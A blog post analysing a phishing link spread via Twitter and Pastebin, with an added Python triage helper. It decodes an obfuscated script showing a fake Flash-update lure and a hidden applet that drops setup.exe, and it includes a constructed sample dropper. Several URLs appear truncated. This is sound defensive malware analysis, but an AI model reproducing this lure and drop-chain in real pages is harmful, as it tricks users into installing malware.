I got a phishing mail, and I followed it

Rishi Narang

We come across so many links on social networking websites, and we unknowingly click many of them. A malicious link can have catastrophic results: your system or your privacy is compromised, or your data takes the hit. Here is one such analysis of a link dated 17.April.2012 that I came across via Twitter and LinkedIn.

NOTE: All links have been written with the non-clickable prefix hxxp:// to prevent mistaken clicks.

Someone posted this link (hxxp://pastebin.com/dRGHt7hy) in a tweet. On checking, it was a list of URLs (actually a single URL pasted multiple times, a sign of desperation),

  • hxxp://tinyurl.com/saw87hujnworeg
  • hxxp://tinyurl.com/saw87hujnworeg
  • hxxp://tinyurl.com/saw87hujnworeg
  • hxxp://tinyurl.com/saw87hujnworeg

9954 credit card numbers

It states that this link has 9954 credit card numbers. The first hint that it is malicious: why not post the data directly rather than pasting the same link four times in one entry?

Next, this is too tempting a lure, so tread carefully. I opened the link in Malzilla (http://malzilla.sourceforge.net/), a malware hunting tool, with auto-redirect disabled. The link hxxp://tinyurl.com/saw87hujnworeg redirected to hxxp:// which opened as text fields with scripts. The file contained only a ‘doubtful’ script along with some headings and titles.

Here is the only important script contained within the page. Let’s do the analysis.

This script is too complex to understand due to its long variable names, so let’s first shorten the variable names for better readability. Here is the modified script with short variable names, without any change to its logic or behaviour.

Now it is easy to follow the logic of the script. First, let us decode the setTimeout and document.write fields. They look Base64-encoded, so let’s try to decode them. The encoded strings are,

1. QWRvYmUgRmxhc2ggbXVzdCBiZSB1cGRhdGVkIHRvIHZpZXcgdGhpcywgcGxlYXNlIGluc3RhbGwgdGhlIGxhdGVzdCB2ZXJzaW9uIQ==
2. aHR0cDovLzIxMi45NS40My4yNDMvamRiL2xpYi9hZG9iZS5waHA/aWQ9MGI3NDBlYmNjMmFiYmM1NTEyYzQ4NzVhMGY3NDk2NWI=
3. DQoJCTxhcHBsZXQgd2lkdGg9IjBweCIgaGVpZ2h0PSIwcHgiIGNvZGU9IlNpdGVMb2FkZXIuY2xhc3MiIGFyY2hpdmU9Imh0dHA6Ly8yM


The decoded strings are,

1. Adobe Flash must be updated to view this, please install the latest version!
2. hxxp://
3. <applet width="0px" height="0px" code="SiteLoader.class" archive="hxxp://">
   <param name="wcZPN" value="hxxp://">
   <param name="v8TOX" value="setup.exe">
   <param name="Legym" value="www.dogscast.com">
   <param name="MpBDG" value="APPDATA">

The first decoded string is meant to entice the victim into installing the ‘latest version’ of Flash via the attacker’s link. We can then see that the script goes on to issue GET requests to the following links,

  1. hxxp://
  2. hxxp://
  3. hxxp://

And the applet parameters are,

  1. name="wcZPN" value="hxxp://"
  2. name="v8TOX" value="setup.exe"
  3. name="Legym" value="www.dogscast.com"
  4. name="MpBDG" value="APPDATA"
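As an added example, not the author’s script or any code from the page: a small Python triage helper that does statically what the analysis above does by hand, pulling the Base64 literals out of a dropper-style script, decoding them, defanging any URLs to hxxp://, and listing the archive, class and <param> values of an applet tag. The sample script is constructed here; only the Flash-lure string comes from the page, and the URLs and id are placeholders.

```python
import base64
import re

# Constructed sample (not the page's script): a dropper-style snippet of the kind
# analysed above, with Base64 literals fed to setTimeout/document.write. The first
# literal is the Flash lure quoted on the page; the URL and <applet> are placeholders.
LURE_B64 = "QWRvYmUgRmxhc2ggbXVzdCBiZSB1cGRhdGVkIHRvIHZpZXcgdGhpcywgcGxlYXNlIGluc3RhbGwgdGhlIGxhdGVzdCB2ZXJzaW9uIQ=="
URL_B64 = base64.b64encode(b"http://dropper.example.invalid/adobe.php?id=PLACEHOLDER").decode()
APPLET_B64 = base64.b64encode(
    b'<applet width="0px" height="0px" code="SiteLoader.class" archive="http://dropper.example.invalid/x.jar">'
    b'<param name="wcZPN" value="http://dropper.example.invalid/load.php">'
    b'<param name="v8TOX" value="setup.exe"><param name="MpBDG" value="APPDATA"></applet>'
).decode()
SAMPLE_SCRIPT = (
    f'var a="{LURE_B64}";var b="{URL_B64}";var c="{APPLET_B64}";'
    "setTimeout(function(){alert(atob(a));location.href=atob(b);},3000);"
    "document.write(atob(c));"
)

B64_LITERAL = re.compile(r'"([A-Za-z0-9+/]{16,}={0,2})"')  # 16+ chars skips short identifiers

def defang(text):
    """Rewrite http(s):// as hxxp(s):// so extracted URLs cannot be clicked by accident."""
    return re.sub(r"\bhttps?://", lambda m: "hxxp" + m.group(0)[4:], text)

def decode_literals(script):
    """Decode every quoted Base64 literal in the script; skip ones that are not valid Base64/UTF-8."""
    found = []
    for m in B64_LITERAL.finditer(script):
        try:
            found.append(base64.b64decode(m.group(1), validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue
    return found

def applet_indicators(html):
    """Pull the JAR archive, loader class and <param> pairs out of a decoded <applet> tag."""
    tag = re.search(r"<applet\b[^>]*>", html)
    if not tag:
        return None
    attrs = dict(re.findall(r'\b(code|archive)="([^"]+)"', tag.group(0)))
    return {"archive": attrs.get("archive"), "code": attrs.get("code"),
            "params": dict(re.findall(r'<param\s+name="([^"]+)"\s+value="([^"]+)"', html))}

def triage(script):
    """Static triage: decoded strings (defanged) plus indicators from any applet drop-chain."""
    decoded = [defang(s) for s in decode_literals(script)]
    applets = [a for a in map(applet_indicators, decoded) if a]
    return decoded, applets
```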

Let us now access these URLs.

  1. First I accessed the adobe.php URL (hxxp:// via Malzilla, and it downloaded a file “Adobe-Flash_WIN.exe” onto my system. The size of this file is approx. 1.16 MB. When scanned via VirusTotal, it was detected by only 2 of 42 anti-malware products. Now, this is scary. I didn’t get a chance to do the run-time analysis of this file, but I will post it in the next blog.

  2. On accessing the second URL (hxxp:// it downloads a JAR file “0b740ebcc2abbc5512c4875a0f74965b.jar”. When extracted, this file yields a “META-INF” directory and a “SiteLoader.class” file. The contents of META-INF include,


Now let’s analyze the third URL, load.php (hxxp:// via Malzilla. When accessed, this link downloads a “setup.exe” file onto the host. This file is identical to the previous one, as shown by its SHA256 hash cb3869fa81086e4f91a61663ccac100f5099ccf4564a971f955f1a61d37aecf5.

This is a brief analysis of a phishing link that started on Twitter as a Pastebin link and made its way to your system through a chain of downloaded files.

Cover Image: Photo by Wynand van Poortvliet on Unsplash